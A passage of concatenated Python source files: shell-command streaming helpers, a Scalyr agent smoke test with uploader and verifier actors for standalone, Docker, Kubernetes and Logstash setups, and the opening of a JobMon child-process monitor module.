# The reason for this is that it works for @property attributes as well as normal attributes.
field_names = [field_name for _, field_name, _, _ in string.Formatter().parse(template) if field_name is not None]
template_values = {}
for field_name in field_names:
try:
template_values[field_name] = getattr(value_object, field_name)
except AttributeError as e:
raise AttributeError(('Unable to apply object to template. Could not look-up attribute \'{}\' in the '
'object \'{}\'. Error: {}').format(field_name, str(value_object), str(e)))
return template.format(**template_values)
def stream_reader(stream, queue):
"""This is a worker that is used by ShellCommand to tail STDOUT and STDERR of a running command.
This worker doesn't have any termination logic and needs to be terminated by the caller.
Arguments:
stream -- A stream to read from. Like subprocess.PIPE. Must support readline() method.
queue -- A multiprocessing.Queue object into which this function will be writing messages from the stream to.
"""
while True:
line = stream.readline().strip()
if line:
queue.put(line)
def stream_writer(queue, stream):
"""This is a worker that constantly reads from the given queue and writes to the given stream the moment any
messages arrive. This is used by ShellCommand to tail the an input queue and write the arriving messages to STDIN.
This worker doesn't have any termination logic and needs to be terminated by the caller.
Arguments:
queue -- A multiprocessing.Queue object from which this function will be reading messages and writing into the
stream.
stream -- A stream to write to. Like subprocess.PIPE. Must support write() method.
"""
while True:
message = queue.get()
stream.write(message)
def create_stream_writer(queue, stream):
"""Runs a writer to tail a queue and write to a stream.
When the shell command is run with Popen, we need a way to asynchronously and non-blockingly receive messages sent
by the user and write to the STDIN of the running process. This is achieved by running the stream_writer function
as a subprocess. Each such instance is called a writer.
The writer reads from the given queue and as soon as it gets a message, it writes it to the given stream.
Typically this is used to read from a multiprocessing.Queue like object and write to a stream like STDIN.
This function creates and runs one instance of a writer.
Arguments:
queue -- A multiprocessing.Queue object from which the writer will be reading messages and writing into the stream.
stream -- A stream to write to. Like subprocess.PIPE. Must support write() method.
Returns:
writer_process -- A multiprocessing.Process object referring to the writer subprocess. This is needed to terminate
the writer since the writer worker contains no termination logic.
"""
writer_process = Process(target=stream_writer, args=(queue, stream))
writer_process.start()
return writer_process
def create_stream_listener(stream):
"""Runs listeners to tail STDOUT and STDERR.
When the shell command is run with Popen, we need a way to asynchronously and non-blockingly read STDOUT and STDERR.
This is achieved by running the stream_reader function as a subprocess.
Each such instance is called a listener. This function creates and runs such listeners:
Arguments:
stream -- A stream to read from. Like subprocess.PIPE. Must support readline() method.
Returns:
A tuple of the form: (listener_process, queue)
Where:
listener_process -- A multiprocessing.Process object referring to the listener subprocess. This is needed to
terminate the listener since the listener contains no termination logic.
queue -- A multiprocessing.Queue object into which the listener will be writing messages from the stream
to. This conversion from a stream like object to a queue like object allows one to read in a
non-blocking manner.
"""
queue = ProcessQueue()
listener_process = Process(target=stream_reader, args=(stream, queue))
listener_process.start()
return (listener_process, queue)
def run_shell_command(shell_command):
"""Run the shell command associated with this class.
Uses Popen to run the command in a separate process.
Arguments:
shell_command -- A string containing the shell command.
Returns:
A tuple of the form: (command_process, stdin, stdout, stderr) Where:
command_process -- A subprocess.Popen object referring to the subprocess that is running the shell command.
stdin -- A subprocess.PIPE object into which the STDIN messages can be written.
stdout -- A subprocess.PIPE object into which the STDOUT is being redirected.
stderr -- A subprocess.PIPE object into which the STDERR is being redirected.
"""
command_as_list = shlex.split(shell_command)
# Run the command as a subprocess
command_process = Popen(command_as_list, stdin=PIPE, stdout=PIPE, stderr=PIPE)
stdin = command_process.stdin
stdout = command_process.stdout
stderr = command_process.stderr
return (command_process, stdin, stdout, stderr)
def tail_command(command_process, stdout_queue, stderr_queue, delay=1):
"""Tail a running command and collect messages from STDOUT and STDERR queues and yield the collected messages with
each iteration.
Arguments:
command_process -- A subprocess.Popen object referring to the subprocess that is running the shell command.
stdout_queue -- A multiprocessing.Queue object into which an STDOUT listener would be writing messages.
stderr_queue -- A multiprocessing.Queue object into which an STDERR listener would be writing messages.
Keyword Arguments:
delay -- The delay in seconds between collecting messages from the STDOUT and STDERR queues.
Returns:
A generator that yields tuples of the form: (stdout_messages, stderr_messages) Where:
stdout_messages -- A list of messages collected from STDOUT stream.
stderr_messages -- A list of messages collected from STDERR stream.
"""
while command_process.poll() is None:
# Sleep has to go at the beginning of the loop because the subsequent statements outside of the loop assume
# that the process has finished and all STDOUT and STDERR messsages have been collected. If sleep is at the end
# of the loop and the process sends some messages to STDOUT or STDERR and exits within this delay, the next
# iteration of the loop will not execute and the messages will be lost.
sleep(delay)
stdout_messages = get_messages_from_queue(stdout_queue)
stderr_messages = get_messages_from_queue(stderr_queue)
yield (stdout_messages, stderr_messages)
def get_messages_from_queue(queue):
"""Read messages from the given queue until it is empty.
Arguments:
queue -- A multiprocessing.Queue like object that supports get_nowait() method and raises Queue.Empty exception
when there are no more messages to be read.
Returns:
list -- A list of messages read from the queue.
"""
messages = []
while True:
try:
messages.append(queue.get_nowait())
except QueueEmpty:
break
return messages
|
smoketest.py
|
"""
Agent smoketest code.
This python script is meant to be invoked within a docker image in which the proper python version is activated (e.g.
via pyenv). In this way, the agent can be validated against different python versions.
Concept:
This code serves as a common code-base for different types of smoketest "processes" (i.e. same code runs in
different modes). Examples of modes are (uploader, verifier).
Uploader (a.k.a Producer):
Waits for Scalyr agent to be up and running (by querying scalyr backend).
Produces 1000 lines of dummy data very quickly, then produces one additional line of data every second.
If the agent is working correctly, this data will be correctly ingested and uploaded to Scalyr (by the agent)
and can subsequently be verified (by the Verifier).
Verifier:
Waits for Scalyr agent to be up and running.
Keeps polling until max_wait for the expected uploader data.
Usage:
smoketest.py ${process_name} ${max_wait} \
--mode verifier \
--scalyr_server ${SCALYR_SERVER} \
--read_api_key ${READ_API_KEY} \
--agent_hostname ${agent_hostname} \
--uploader_hostname ${uploader_hostname} \
--debug true"
where:
process_name: A means by which the invoker script can inform this script what the current process name is.
The process_name is important as it is parsed/modified to construct verifying queries.
E.g. process_name is used to construct a logfile to be queried such as "/docker/<process_name>-uploader.log".
Moreover, any given CI build should not conflict with other builds and therefore should have a unique
process name (e.g. /docker/ci-agent-docker-json-5986-uploader.log where "ci-agent-docker-json-5986" is a unique
identifier specific to a CI build.
Additionally, the process name determines which class to instantiate (see
CONTAINER_PREFIX_2_VERIFIER_CLASS). The invoker can choose different implementations (e.g. for LogStash)
by using on of the prefixes defined CONTAINER_PREFIX_2_VERIFIER_CLASS. An object of that class is then
instantiated and begins running in the specified mode (either as an Uploader or Verifier).
max_wait: Maximum time to run until exiting with failure.
mode: Operational mode which determines what this process does. Must be one of (uploader, verifier, agent).
scalyr_server: Scalyr backend server to connect to (typically qatesting.scalyr.com when testing)
monitored_logfile: Absolute path of the data file to write which the agent then ingests. Logstash producers also
write to this file which is then configured to as an input into the Logstash aggregator.
python_version: Python version that the agent is running on (becomes part of the Uploader data)
read_api_key: Read API key to use when querying the Scalyr backend to verify expected data has been uploaded.
agent_hostname: Uploaders and Verifiers need to know the agent_hostname of the agent process in order to construct
a proper verifying query (because they query for a log line uploaded by the agent in order to know when it has
successfully started. This agent_hostname is typically passed in by the invoker script that starts the Uploader
or Verifier.
uploader_hostname: Similar to agent_hostname, Verifiers need to wait for Uploaders to finish uploading before
performing their verifying queries. The uploader_hostname is a necessary piece of information typically passed
in by the invoker script that starts the Uploader and Verifier.
debug: true|false . If true, prints out all Scalyr api queries (useful for debugging)
Note:
This test code require python 3 with specific packages installed (i.e. requests)
"""
__author__ = "echee@scalyr.com"
import argparse
import os
import json
import time
import requests
import socket
import sys
import threading
import urllib
from copy import deepcopy
NAME_SUFFIX_UPLOADER = "uploader"
NAME_SUFFIX_VERIFIER = "verifier"
# no actual Actor will run as the this name but the constant is needed for logic that checks on the Agent container
NAME_SUFFIX_AGENT = "agent"
NAME_SUFFIXES = [NAME_SUFFIX_UPLOADER, NAME_SUFFIX_VERIFIER, NAME_SUFFIX_AGENT]
def _pretty_print(header="", message="", file=sys.stdout):
if header:
print("", file=file)
print("=" * 79, file=file)
print(header, file=file)
print("=" * 79, file=file)
if len(message) > 0: # message can be spaces
print(message, file=file)
def _exit(code, show_agent_status=True, header="", message=""):
"""Prints agent status before exiting"""
file = sys.stdout if code == 0 else sys.stderr
if show_agent_status:
_pretty_print(header="BEGIN AGENT STATUS")
# TODO fix this to work under python 3
print("TODO: Scalyr agent status does not work under python 3 yet")
# agent_exec = '/usr/share/scalyr-agent-2/bin/scalyr-agent-2'
# if os.path.isfile(agent_exec):
# os.system('{} status -v'.format(agent_exec))
_pretty_print(header="END AGENT STATUS")
_pretty_print(message=" ")
_pretty_print(header, message, file=file)
# exit even if other threads are running
os._exit(code)
class SmokeTestActor(object):
"""
Abstract base class for all verifiers.
Some objects may only upload.
Others may only verify.
Some may do both, in which case we may need a barrier
"""
DEFAULT_POLL_INTERVAL_SEC = 10
def __init__(self, **kwargs):
self._process_name = kwargs.get("process_name")
self._scalyr_server = kwargs.get("scalyr_server")
self._read_api_key = kwargs.get("read_api_key")
self._max_wait = float(kwargs.get("max_wait"))
self._localhostname = socket.gethostname()
self._barrier = None
self._barrier_lock = threading.Lock()
self._lines_to_upload = 1000
self.__init_time = time.time()
self._agent_started_lock = threading.Lock()
self._agent_started = False
self._debug = (kwargs.get("debug") or "").lower() in (
"true",
"y",
"yes",
"t",
"1",
)
def _get_uploader_output_streams(self):
"""Returns list of streams to write log data"""
raise NotImplementedError
def _get_uploader_stream_names(self):
"""Returns list of streams to write log data"""
raise NotImplementedError
def _get_stream_name_from_stream(self, stream):
return stream.name[1:-1]
def get_hard_kill_time(self):
"""Returns time in epoch seconds for when this process must terminate"""
return self.__init_time + self._max_wait
def verifier_type(self):
raise NotImplementedError
def is_verifier(self):
raise NotImplementedError
def is_uploader(self):
raise NotImplementedError
def _get_barrier(self, parties=2):
"""Lazy-instantiate a barrier"""
with self._barrier_lock:
if not self._barrier:
self._barrier = threading.Barrier(parties, timeout=self._max_wait)
return self._barrier
def __wait_at_barrier(self):
"""
For coordinating processes.
Currently only used to prevent uploader OR verifier from proceeding until agent is verified up and running.
Note: uploader and verifier do not block each other, regardless of whether they
run within same process or in different processes.
"""
barrier = self._get_barrier()
if barrier:
print("... Blocking at barrier")
barrier.wait()
print("... Unblocked")
def exit(self, code, **kwargs):
_exit(code, **kwargs)
def verify_logs_uploaded(self):
"""Query scalyr to verify presence of uploaded data"""
raise NotImplementedError
def verify_agent_started_or_die(self):
"""Verify state or processes that should be present or running if agent is running"""
raise NotImplementedError
def wait_for_agent_to_start(self):
"""Both upload or verification should not begin until agent is confirmed started"""
with self._agent_started_lock:
if not self._agent_started:
self.verify_agent_started_or_die()
self._agent_started = True
def verify_or_die(self):
"""
Query the Scalyr backend in search for what we know we uploaded.
Error out after a certain time limit.
Returns:
Nothing. Exits with status 0 or 1
"""
self.wait_for_agent_to_start()
self.verify_logs_uploaded()
def _make_log_line(self, count, stream):
"""Return a line of text to be written to the log. Don't include trailing newline
Args:
count: line number (concrete class may choose to incorporate into line content for verification)
stream: output stream (concrete class may choose to incorporate into line content for verification)
"""
raise NotImplementedError
def trigger_log_upload(self):
self.wait_for_agent_to_start()
streams = self._get_uploader_output_streams()
count = 0
while time.time() < self.get_hard_kill_time():
for stream in streams:
stream.write(self._make_log_line(count, stream))
stream.write("\n")
stream.flush()
if count >= self._lines_to_upload:
time.sleep(1) # slow down if threshold is reached
# Write to all streams for a given count
count += 1
def _make_query_url(
self,
filter_dict=None,
message="",
override_serverHost=None,
override_log=None,
override_log_regex=None,
):
"""
Make url for querying Scalyr server. Any str filter values will be url-encoded
"""
base_params = self._get_base_query_params()
url = "https://" if not self._scalyr_server.startswith("http") else ""
url += "{}/api/query?queryType=log&{}".format(
self._scalyr_server, urllib.parse.urlencode(base_params)
)
# Set serverHost/logfile from object state if not overridden
if not filter_dict:
filter_dict = {}
filter_dict["$serverHost"] = override_serverHost or self._process_name
# only if no log regex is provided do we then add an exact logfile match
if not override_log_regex:
filter_dict["$logfile"] = (
override_log or self._logfile # pylint: disable=no-member
)
filter_frags = []
for k, v in filter_dict.items():
if type(v) == str:
v = '"{}"'.format(urllib.parse.quote_plus(v))
filter_frags.append("{}=={}".format(k, v))
# If log regex is provided, add a regex matches clause
if override_log_regex:
filter_frags.append(
'{} matches "{}"'.format("$logfile", override_log_regex)
)
# Add message
if message:
filter_frags.append(
"$message{}".format(
urllib.parse.quote_plus(' contains "{}"'.format(message))
)
)
url += "&filter={}".format("+and+".join(filter_frags))
if self._debug:
print("\nURL quoted = {}".format(url))
print(" unquoted = {}".format(urllib.parse.unquote_plus(url)))
return url
def _get_base_query_params(self):
"""Get base query params (not including filter)"""
params = {
"maxCount": 1,
"startTime": "10m",
"token": self._read_api_key,
}
return params
def poll_until_max_wait(
self,
verify_func,
description,
success_mesg,
fail_mesg,
exit_on_success=False,
exit_on_fail=False,
poll_interval=None,
):
"""
Template design pattern method for polling until a maximum time. Each poll executes the provided verify_func().
fail/success messages are parameterized, as well as whether to exit.
Args:
verify_func: Function to execute for each check. Must return True/False
description: Text to print at beginning of check
success_mesg: Text to print on success
fail_mesg: Text to print on failure
exit_on_success: If success, exit (with code 0)
exit_on_fail: If fail, exit (with code 1)
"""
_pretty_print(description)
verified = False
prev = time.time()
while time.time() < self.get_hard_kill_time():
# Try to verify upload by querying Scalyr server
sys.stdout.write(". ")
sys.stdout.flush()
verified = verify_func()
# query backend to confirm.
if verified:
success_mesg = "\nSUCCESS !!. " + success_mesg
if exit_on_success:
self.exit(0, message=success_mesg)
else:
_pretty_print(message=success_mesg, file=sys.stdout)
break
# Sleep a bit before trying again
time.sleep(poll_interval or SmokeTestActor.DEFAULT_POLL_INTERVAL_SEC)
cur = time.time()
if cur - prev > 10:
print(
"{} seconds remaining".format(int(self.get_hard_kill_time() - cur))
)
prev = cur
else:
fail_mesg = "FAILED. Time limit reached. " + fail_mesg
if exit_on_fail:
self.exit(1, message=fail_mesg)
else:
_pretty_print(message=fail_mesg, file=sys.stderr)
class StandaloneSmokeTestActor(SmokeTestActor):
"""
Standalone agent verifier.
A single process performs both Uploader and Verifier tasks.
Therefore, the logfile that we Upload to is the same file that is verified (filename queried for verification).
Waits for same-host Agent to be up and running (by watching for local agent.pid/log files).
Then writes to a Json file which is picked up by Agent.
Finally, queries Scalyr backend to condfirm Json file was uploaded.
"""
VERIFIER_TYPE = "Standalone"
def __init__(self, **kwargs):
super().__init__(**kwargs)
self._logfile = kwargs.get("monitored_logfile")
self._python_version = kwargs.get("python_version")
def is_verifier(self):
return True
def is_uploader(self):
return True
def _get_uploader_output_streams(self):
"""Returns stream to write log data into"""
return [open(self._logfile, "w+")]
def _get_uploader_stream_names(self):
"""Returns stream to read log data from"""
return [self._logfile]
def _make_log_line(self, count, stream):
"""Return a line of JSON for data.json (which is uploaded by the Agent)"""
obj = {
"verifier_type": self.VERIFIER_TYPE,
"count": count,
"hostname": self._localhostname,
"python_version": "python{}".format(self._python_version),
"line_stream": stream.name,
}
return json.dumps(obj)
def verify_agent_started_or_die(self):
"""Poll for agent pid and log file"""
def _check_agent_pid_and_log_files():
# If agent is not started, print agent.log if it exists
agent_logfile = "/var/log/scalyr-agent-2/agent.log"
agent_pid_file = "/var/log/scalyr-agent-2/agent.pid"
if not os.path.isfile(agent_pid_file) or not os.path.isfile(agent_logfile):
return False
return True
self.poll_until_max_wait(
_check_agent_pid_and_log_files,
"Checking for agent pid and log files",
"Agent is running.",
"No agent running.",
poll_interval=1,
)
def verify_logs_uploaded(self):
"""
For standalone agent, confirmation of log upload impinges on successful poll
of a single matching row as follows:
python_version matches the standalone agent python version
hostname matches the docker container hostname running the standalone agent
"""
def _query_scalyr_for_monitored_log_upload():
# TODO: This should be self._lines_to_upload (i.e. 1000, but it doesn't work
# for logstash where for some reason only 300-600 lines are uploaded most
# of the time. Once that bug is fixed, change this back to self._lines_to_upload
expected_count = 1000
resp = requests.get(
self._make_query_url(
{
"$verifier_type": self.VERIFIER_TYPE,
"$python_version": "python{}".format(self._python_version),
"$hostname": self._localhostname,
"$count": expected_count,
}
)
)
if resp.ok:
data = json.loads(resp.content)
if "matches" not in data:
return False
matches = data["matches"]
if len(matches) == 0:
return False
att = matches[0]["attributes"]
verifier_type = att["verifier_type"]
python_version = att["python_version"]
hostname = att["hostname"]
cnt = att["count"]
if all(
[
verifier_type == self.VERIFIER_TYPE,
python_version == "python{}".format(self._python_version),
hostname == self._localhostname,
cnt == expected_count,
]
):
return True
return False
self.poll_until_max_wait(
_query_scalyr_for_monitored_log_upload,
"Querying server to verify monitored logfile was uploaded.",
"Monitored logfile upload verified",
"Monitored logfile upload not verified",
exit_on_success=True,
exit_on_fail=True,
)
class DockerSmokeTestActor(SmokeTestActor):
"""
Base Docker actor.
Some containers will write logs to Scalyr but only one container will verify.
(The current setup has only one uploader + one verifier)
Because there are multiple processes (containers) running, it is necessary to synchronize them for the Smoketest
to correctly work.
Upload / Verify will not begin until the remote agent is confirmed to be up and running. This is done by querying
Scalyr.
For clarity/maintainability of the Upload/Verifier code, an actor should only upload or verify, not both. (This is
different from the Standalone actor where a single process runs both upload and verify and checks the local agent
via file system).
"""
def __init__(self, **kwargs):
"""
:param max_wait: Max seconds before exiting
:param mode: One of 'query', 'upload_and_ verify'
"""
super().__init__(**kwargs)
self.mode = kwargs.get("mode")
self._logfile = "/docker/{}.log".format(self._process_name)
self._agent_hostname = kwargs.get("agent_hostname")
self._uploader_hostname = kwargs.get("uploader_hostname")
_pretty_print('Agent hostname="{}"'.format(self._agent_hostname))
_pretty_print('Uploader hostname="{}"'.format(self._uploader_hostname))
def is_verifier(self):
return self.mode == NAME_SUFFIX_VERIFIER
def is_uploader(self):
return self.mode == NAME_SUFFIX_UPLOADER
def _serialize_row(self, obj):
"""Write a single row of key=value, separated by commas. Standardize by sorting keys"""
keyvals = [(key, obj.get(key)) for key in sorted(obj.keys())]
return ",".join(["{}={}".format(k, v) for k, v in keyvals])
def _make_log_line(self, count, stream):
return self._serialize_row(
{
"verifier_type": self.VERIFIER_TYPE, # pylint: disable=no-member
"count": count,
"line_stream": self._get_stream_name_from_stream(stream),
# No need hostname in logline. The agent_container_id & remote-container-logfile name uniquely identify the
# correct log.
# "hostname": self._localhostname,
}
)
def _get_process_name_for_suffix(self, suffix):
assert suffix in [
NAME_SUFFIX_AGENT,
NAME_SUFFIX_UPLOADER,
NAME_SUFFIX_VERIFIER,
]
parts = self._process_name.split("-")[:-1]
parts.append(suffix)
return "-".join(parts)
def _get_stream_name_from_stream(self, stream):
return stream.name[1:-1]
def _get_uploader_output_streams(self):
return [sys.stderr, sys.stdout]
def _get_uploader_stream_names(self):
"""Docker and k8s subclasses all verify by querying stream names of 'stderr' and 'stdout'"""
return [stream.name[1:-1] for stream in [sys.stderr, sys.stdout]]
def verify_agent_started_or_die(self):
"""
Docker agent is not running in same container as Verifier.
Verifier must query Scalyr to determine presence of these 2 files:
serverHost=<agent_short_container_id>, logfile=/var/log/scalyr-agent-2/agent.log
serverHost=<agent_short_container_id>, logfile=/var/log/scalyr-agent-2/docker_monitor.log
filter="Starting monitor docker_monitor()"
"""
def _query_scalyr_for_agent_logfile(logfile):
def _func():
resp = requests.get(
self._make_query_url(
override_serverHost=self._agent_hostname, override_log=logfile,
)
)
if resp.ok:
data = json.loads(resp.content)
if "matches" not in data:
return False
matches = data["matches"]
if len(matches) == 0:
return False
return True
return False
return _func
for filename in self._get_expected_agent_logfiles():
self.poll_until_max_wait(
_query_scalyr_for_agent_logfile(filename),
"Check if Agent is running: query scalyr for agent container file: {}".format(
filename
),
"{} found".format(filename),
"Time limit reached. Could not verify liveness of Agent Docker Container.",
exit_on_success=False,
exit_on_fail=True,
)
def _get_expected_agent_logfiles(self):
return [
"/var/log/scalyr-agent-2/agent.log",
"/var/log/scalyr-agent-2/docker_monitor.log",
]
def _get_uploader_override_logfilename_regex(self, process_name):
"""All logfile filters are exact and therefore we return None in the general case"""
return None
def _get_mapped_logfile_prefix(self):
raise NotImplementedError
def _get_extra_query_attributes(self, stream_name, process_name):
"""Dictionary of query field key-vals (besides serverHost, logfile, filters)"""
raise NotImplementedError
def _verify_queried_attributes(self, att, stream_name, process_name):
if att.get("containerName") != process_name:
return False
return True
def verify_logs_uploaded(self):
"""
For docker agent, confirmation requires verification that all uploaders were able to uploaded.
There are 2 separate types of containers.
1. uploader: uploads data to Scalyr (can easily support multiple but for now, just 1)
2. verifier: verifies data was uploaded by uploader
"""
def _query_scalyr_for_upload_activity(contname_suffix, stream_name):
def _func():
process_name = self._get_process_name_for_suffix(contname_suffix)
resp = requests.get(
self._make_query_url(
self._get_extra_query_attributes(stream_name, process_name),
override_serverHost=self._agent_hostname,
override_log="{}/{}.log".format(
self._get_mapped_logfile_prefix(), process_name
),
override_log_regex=self._get_uploader_override_logfilename_regex(
process_name
),
message=self._serialize_row(
{
"verifier_type": self.VERIFIER_TYPE, # pylint: disable=no-member
"count": self._lines_to_upload,
"line_stream": stream_name,
}
),
)
)
if resp.ok:
data = json.loads(resp.content)
if "matches" not in data:
return False
matches = data["matches"]
if len(matches) == 0:
return False
att = matches[0]["attributes"]
return self._verify_queried_attributes(
att, stream_name, process_name
)
return False # Non-ok response
return _func
suffixes_to_check = [NAME_SUFFIX_UPLOADER]
for count, suffix in enumerate(suffixes_to_check):
for stream_name in self._get_uploader_stream_names():
self.poll_until_max_wait(
_query_scalyr_for_upload_activity(suffix, stream_name),
"Querying server to verify upload: container[stream]='{}[{}].".format(
self._get_process_name_for_suffix(suffix), stream_name
),
"Upload verified for {}[{}].".format(suffix, stream_name),
"Upload not verified for {}[{}].".format(suffix, stream_name),
exit_on_success=count == len(suffixes_to_check),
exit_on_fail=True,
)
class DockerJsonActor(DockerSmokeTestActor):
"""These subclasses capture differences between JSON and Syslog implementations"""
VERIFIER_TYPE = "Docker JSON"
def _get_mapped_logfile_prefix(self):
return "/docker"
def _get_extra_query_attributes(self, stream_name, process_name):
return {"$stream": stream_name}
def _verify_queried_attributes(self, att, stream_name, process_name):
if not super()._verify_queried_attributes(att, stream_name, process_name):
return False
if not all(
[att.get("stream") in stream_name, att.get("monitor") == "agentDocker"]
):
return False
return True
class DockerSyslogActor(DockerSmokeTestActor):
VERIFIER_TYPE = "Docker Syslog"
def _get_extra_query_attributes(self, stream_name, process_name):
return {}
def _get_mapped_logfile_prefix(self):
return "/var/log/scalyr-agent-2/containers"
def _verify_queried_attributes(self, att, stream_name, process_name):
if not super()._verify_queried_attributes(att, stream_name, process_name):
return False
if not all(
[
att.get("monitor") == "agentSyslog",
att.get("parser") == "agentSyslogDocker",
]
):
return False
return True
class K8sActor(DockerSmokeTestActor):
"""
Uploaders write to std output/error
Verifiers query for 'stdout', 'stderr'
"""
VERIFIER_TYPE = "Kubernetes"
def _get_expected_agent_logfiles(self):
return [
"/var/log/scalyr-agent-2/agent.log",
"/var/log/scalyr-agent-2/kubernetes_monitor.log",
]
def _get_mapped_logfile_prefix(self):
return "/docker"
def _get_extra_query_attributes(self, stream_name, process_name):
return {"$stream": stream_name}
def _verify_queried_attributes(self, att, stream_name, process_name):
"""
Here's example JSON response for k8s
"matches": [
{
"severity": 3,
"session": "log_session_5645060384390470634",
"attributes": {
"pod_namespace": "default",
"scalyr-category": "log",
"stream": "stderr",
"pod_uid": "f2d1d738-9a0c-11e9-9b04-080027029126",
"pod-template-hash": "76bcb9cf9",
"run": "ci-agent-k8s-7777-uploader",
"monitor": "agentKubernetes",
"k8s_node": "minikube",
"serverHost": "scalyr-agent-2-z5c8l",
"container_id": "6eb4215ac1589de13089419e90cdfe08c01262e6cfb821f18061a63ab4188a87",
"raw_timestamp": "2019-06-29T03:16:28.058676421Z",
"pod_name": "ci-agent-k8s-7777-uploader-76bcb9cf9-cb96t"
},
"thread": "default",
"message": "count=1000,line_stream=<stderr>,verifier_type=Kubernetes\n",
"timestamp": "1561778193736899060"
}
],
"""
if not all(
[
att.get("stream") in stream_name,
att.get("monitor") == "agentKubernetes",
process_name in att.get("pod_name"),
]
):
return False
return True
def _get_uploader_override_logfilename_regex(self, process_name):
"""For k8s, return a logfile regex because it too difficult to construct an exact logfile filter.
The regex clause becomes: $logfile+matches+"/docker/k8s_ci-agent-k8s-7777-uploader.*"
"""
return "{}/k8s_{}*".format(self._get_mapped_logfile_prefix(), process_name)
class LogstashActor(DockerSmokeTestActor):
"""
Uploader writes to a common shared logfile that is bind-mounted in a shared volume (not local disk)
Verifier reads from common shareed logfile
"""
VERIFIER_TYPE = "Logstash"
def __init__(self, **kwargs):
super().__init__(**kwargs)
self._monitored_logfile = kwargs.get("monitored_logfile")
def _get_uploader_output_streams(self):
"""Returns stream for Uploader to write log data into"""
return [open(self._monitored_logfile, "w+")]
def _get_uploader_stream_names(self):
"""Returns stream to read log data from"""
return [self._monitored_logfile]
def _get_stream_name_from_stream(self, stream):
return stream.name
def _get_expected_agent_logfiles(self):
return ["scalyr_logstash.log"]
def _get_mapped_logfile_prefix(self):
return "/logstash"
def _get_extra_query_attributes(self, stream_name, process_name):
# {'$stream': stream.name}
# no server-side parser has been defined so cannot filter on $stream
return {}
def _verify_queried_attributes(self, att, stream_name, process_name):
if not all(
[
# att.get('stream') in stream.name, # we haven't setup server-side parser so $stream is not available
# Since the input streams are locally mounted, the event origins are all the same as the agent hostname
att.get("origin") == self._agent_hostname,
# the following fields are added on in the logstash pipeline config
# and should appear in every event
att.get("output_attribute1") == "output_value1",
att.get("output_attribute2") == "output_value2",
att.get("output_attribute3") == "output_value3",
# TODO: adjust if these are eventually split into "booleans"a
att.get("tags") == "[tag_t1, tag_t2]",
]
):
return False
return True
def _get_uploader_override_logfilename_regex(self, process_name):
"""For logstash setup, the input is a local file mounted to the logstash container, hence the fields are
host=container_id, path=/tmp/ci-plugin-logstash-7778-uploader.log
host/path are mapped to origin/logfile
"""
return self._monitored_logfile
# Select verifier class based on containers name (prefix)
CONTAINER_PREFIX_2_VERIFIER_CLASS = {
"ci-agent-standalone": StandaloneSmokeTestActor,
"ci-agent-docker-json": DockerJsonActor,
"ci-agent-docker-syslog": DockerSyslogActor,
"ci-agent-k8s": K8sActor,
"ci-plugin-logstash": LogstashActor,
}
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"process_name",
type=str,
help="name of process running this instance of test code. Prefix should be a key in "
"CONTAINER_PREFIX_2_VERIFIER_CLASS so that the correct verifier can be chosen.",
)
parser.add_argument(
"max_wait", type=int, help="max seconds this test will run (will force-quit)"
)
# Generic param that can be used by any test as needed
parser.add_argument("--mode", type=str, help="mode switch", choices=NAME_SUFFIXES)
# For connecting to Scalyr. Note that we need not supply SCALYR_API_KEY as the Agent gets it from it's own config
# or the environment.
parser.add_argument(
"--scalyr_server",
type=str,
help="Scalyr backend server (required by Agent or Verifier containers)",
)
parser.add_argument(
"--read_api_key",
type=str,
help="read api key (required all Verifier containers)",
)
# For Standalone testing
parser.add_argument(
"--monitored_logfile",
type=str,
help="absolute path of data file to write to (must match Agent config). "
"Logstash producers also write to this, which are then picked up by the Logstash agent.",
)
parser.add_argument(
"--python_version",
type=str,
help="python version agent is running on (will be added into generated test data)",
)
# For Docker testing
parser.add_argument(
"--agent_hostname",
type=str,
help="hostname of Agent container (required by Docker/k8s Verifier containers",
)
parser.add_argument(
"--uploader_hostname",
type=str,
help="hostname of Uploader container (required by Docker/k8s Verifier containers",
)
parser.add_argument("--debug", type=str, help="turn on debugging")
args = parser.parse_args()
klass = None
for key, val in CONTAINER_PREFIX_2_VERIFIER_CLASS.items():
if args.process_name.startswith(key):
klass = CONTAINER_PREFIX_2_VERIFIER_CLASS.get(key)
break
# Display args to stdout, redacting sensitive keys
_pretty_print("Launching actor", message="Class={}".format(klass))
if not klass:
_exit(
1,
message="Bad test config: process_name must start with one of {}".format(
CONTAINER_PREFIX_2_VERIFIER_CLASS.keys()
),
)
args_copy = deepcopy(vars(args))
if "read_api_key" in args_copy:
args_copy["read_api_key"] = args_copy["read_api_key"][:4] + "xxxxxxxxx"
_pretty_print("smoketest.py command line args", str(args_copy))
actor = klass(**vars(args)) # type: ignore
# Optionally start upload in a separate thread. Verifiers should not upload.
uploader_thread = None
if actor.is_uploader():
_pretty_print("START UPLOAD", actor._process_name)
uploader_thread = threading.Thread(target=actor.trigger_log_upload, args=())
uploader_thread.start()
if actor.is_verifier():
_pretty_print("START VERIFIER", actor._process_name)
actor.verify_or_die()
# If verify_or_die hasn't force-killed the program, wait for uploader to finish
if uploader_thread:
uploader_thread.join()
|
monitor.py
|
"""
JobMon - Job Monitoring
=======================
Controls and monitors child processes - this handles both starting and stopping
subprocesses, as well as notifying the owner that the subprocesses have started
(or stopped) via an event queue. An example usage of :class:`ChildProcessSkeleton`
(which is used by the :mod:`jobmon.config`) follows::
>>> proc = ChildProcessSkeleton('echo "$MESSAGE"')
>>> proc.config(stdout='/tmp/hello-world',
... env={'MESSAGE': 'Hello, World'})
>>> proc.set_sock(THE_STATUS_SOCKET)
The event queue (``THE_EVENT_QUEUE`` in the example) receives two kinds of
events from the child process - :class:`ProcStart` indicates that a process has
been started, while :class:`ProcStop` indicates that a process has stopped.
"""
import logging
import os
import signal
import sys
import threading
from jobmon import protocol, util
LOGGER = logging.getLogger('supervisor.child-process')
class AtomicBox:
"""
A value, which can only be accessed by one thread at a time.
"""
def __init__(self, value):
self.lock = threading.Lock()
self.value = value
def set(self, value):
"""
Sets the value of the box to a new value, blocking if anybody is
reading it.
"""
with self.lock:
self.value = value
def get(self):
"""
Gets the value of the box, blocking if anybody is writing to it.
"""
with self.lock:
return self.value
class ChildProcess:
def __init__(self, event_sock, name, program, **config):
"""
Create a new :class:`ChildProcess`.
:param protocol.Protocol* event_sock: The event socket to send start/stop events to.
:param str name: The name of this job.
:param str program: The program to run, in a format supported by ``/bin/sh``.
:param str config: See :meth:`config` for the meaning of these options.
"""
self.event_sock = event_sock
self.name = name
self.program = program
self.child_pid = AtomicBox(None)
self.stdin = '/dev/null'
self.stdout = '/dev/null'
